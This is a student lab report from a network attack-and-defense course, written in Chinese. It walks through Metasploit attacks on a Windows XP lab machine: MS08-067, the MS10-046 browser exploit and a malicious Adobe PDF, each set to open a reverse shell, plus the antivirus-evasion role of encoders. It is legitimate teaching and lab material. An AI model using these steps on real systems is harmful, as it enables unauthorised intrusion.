20145239杜文超《网络攻防》- MSF基础应用
基础问题回答
1、用自己的话解释什么是exploit,payload,encode?
- exploit:实现攻击行为的主体,但没有载荷只是一个空壳。没有子弹的枪是很好的比喻。
- payload:载荷。一般指shellcode,攻击成功后需要运行的东西。
- encode:编码器。使得我们的攻击中不会出现“坏字符”,也可以通过编码改变特征码,实现免杀。
实验总结与体会
msf仅仅是一个攻击平台,攻击具体的实现还是要靠抓住靶机上的漏洞进行。本次实验我对metasploit的体系结构有了初步的认识。尤其是对6个主要模块的功能和用途有了深入理解和实践经验。我也深刻的认识到在现实中想要真正攻陷一台靶机还是有难度的,因为本次实验我使用的靶机是win xp sp3英文版系统。很老,应该算是被淘汰的了,所以才会有那么多漏洞让我可以抓住去攻击,现在windows版本不断更新,漏洞补丁的更新速度也越来越快,因此更体现出了0 day漏洞的价值。
实验过程
实验环境配置
攻击机:Kali(IP:192.168.248.128)
靶机:Windows XP SP3(IP:192.168.248.129)
MS08_067漏洞渗透攻击
1、先用search ms08_067指令查询该攻击模块。
2、输入use exploit/windows/smb/ms08_067_netapi使用该模块,并用show payloads指令查看一下要用的payload。
3、输入set payload generic/shell_reverse_tcp设置一下payload,通过反向连接获取shell。
4、使用show options指令查看需要进行的配置。
5、如图所示进行配置,设置RHOST为远程靶机IP地址、LHOST为主机IP地址。
6、设置完成后再次确认刚才的设置。
7、输入exploit发起攻击。
8、攻击成功,成功获取靶机系统shell。
对浏览器攻击:ms10_046漏洞攻击
1、先利用search ms10_046指令查看可以运用的攻击模块.
2、使用该漏洞进行攻击。
3、设置相关参数。SRVHOST是本地监听主机的IP地址,LHOST是监听的IP地址,都填攻击者本机IP地址。
4、发起攻击,可以看到,生成了url链接地址。
5、我们使用靶机的IE浏览器登陆一下刚才生成的url地址。
6、发现主机这边已经攻击成功了。
7、使用命令sessions -i 1开始连接,成功得到shell。
对Adobe的漏洞攻击:adobe_pdf_embedded_exe
1、进入文件攻击目录选择一个合适的adobe漏洞。
2、我选择的是adobe_pdf_embedded_exe,use这个漏洞。
3、设置一下payload攻击有效载荷:set payload windows/meterpreter/reverse_tcp
4、show options查看需要进行哪些配置。
5、设置文件名称5239.pdf,LHOST为攻击者主机IP。
6、再次使用show options检查配置。
7、发起攻击。发现生成了一个名为5239的pdf文件。
8、把攻击主机设置为监听状态,方法和以前的实验类似。
9、将该pdf拷贝到靶机上然后打开。
10、攻击机已经成功获取到靶机shell。
辅助模块的应用:scanner/http/dir_listing
1、先用search了解一下有关scanner/http/dir_listing的相关信息。
2、设置相关参数。
3、run,运行成功。
